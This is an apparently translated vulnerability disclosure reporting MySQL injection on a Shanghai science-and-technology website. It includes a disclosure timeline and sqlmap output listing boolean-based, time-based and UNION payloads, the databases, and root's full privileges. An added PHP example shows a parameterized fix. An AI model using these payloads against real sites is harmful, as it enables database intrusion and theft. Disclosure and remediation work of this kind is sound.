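2015-09-25: Details reported to the vendor; awaiting vendor handling
2015-09-30: CNCERT (National Internet Emergency Center) has not yet been able to contact the responsible organization; details disclosed only to the notifying body
2015-10-10: Details disclosed to core white hats and experts in related fields
2015-10-20: Details disclosed to regular white hats
2015-10-30: Details disclosed to intern white hats
2015-11-14: Details disclosed to the public

Shanghai Science and Technology Network (上海科技网) has MySQL injection in multiple places, e.g. http://**.**.**.**/net_zx.php?id=4, http://**.**.**.**/product_show.php?id=2, and others.

1. Injection point: http://**.**.**.**/product_show.php?id=1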
......
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 4379=4379 AND 'kGkg'='kGkg

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: id=1' AND (SELECT * FROM (SELECT(SLEEP(5)))XZJm) AND 'msPp'='msPp

    Type: UNION query
    Title: Generic UNION query (NULL) - 5 columns
    Payload: id=-8771' UNION ALL SELECT NULL,NULL,CONCAT(0x717a626271,0x4f5a44754758434b7263,0x716b767071),NULL,NULL-- 
---
web application technology: PHP 5.4.23
back-end DBMS: MySQL 5.0.12
available databases [5]:
[*] information_schema
[*] kjw
[*] kjwen
[*] mysql
[*] performance_schema
Database system administrator privileges?
......
database management system users privileges:
[*] 'root'@'localhost' (administrator) [28]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TABLESPACE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE
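Some accounts and passwords: admin
root
root privileges
Severity: Medium
Vulnerability Rank: 10
Confirmed: 2015-09-30 08:29
CNVD confirmed the situation described and has passed it to CNCERT to issue to the Shanghai sub-center, which will follow up and coordinate with the website's operator to handle it.
None yet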
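The fix for the `id` parameter reported above, as an added example that is not the site's code: the string-concatenated lookup implied by the `id=1'` payloads, next to a validated, parameterized version. The `product` table, its row, and the function names `show_vulnerable` and `show_hardened` are constructed for illustration, and an in-memory SQLite database stands in for the MySQL back end.

```php
<?php
// Added example, not the site's code. Table, rows and function names are
// constructed; in-memory SQLite stands in for the MySQL back end.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE product (id INTEGER PRIMARY KEY, name TEXT)");
$db->exec("INSERT INTO product (id, name) VALUES (1, 'sample product')");

// Vulnerable pattern implied by the id=1' payloads: the GET parameter is
// concatenated inside a quoted literal, so a quote in it ends the literal.
function show_vulnerable(PDO $db, $id)
{
    $sql = "SELECT name FROM product WHERE id = '" . $id . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened: accept only decimal digits, then bind the value as an integer so
// it can never be parsed as SQL.
function show_hardened(PDO $db, $id)
{
    if (!is_string($id) || !ctype_digit($id)) {
        return array(); // the page handler would answer 400/404 here
    }
    $stmt = $db->prepare("SELECT name FROM product WHERE id = :id");
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

$inputs = array(
    'normal request'         => "1",
    // Boolean-based payload value copied from the sqlmap output above.
    'probe, true condition'  => "1' AND 4379=4379 AND 'kGkg'='kGkg",
    // Constructed twin with a false condition, for comparison.
    'probe, false condition' => "1' AND 4379=4380 AND 'kGkg'='kGkg",
);

foreach ($inputs as $label => $id) {
    printf("%-24s vulnerable=%d row(s)  hardened=%d row(s)\n",
        $label,
        count(show_vulnerable($db, $id)),
        count(show_hardened($db, $id)));
}
```

The vulnerable lookup answers the two probes differently, which is the true/false signal boolean-based blind injection relies on, while the hardened lookup treats both as invalid input. Because the report shows the application connecting as `'root'@'localhost'` with FILE and SUPER, the query fix belongs together with a dedicated database account limited to the privileges the site needs on its own schema.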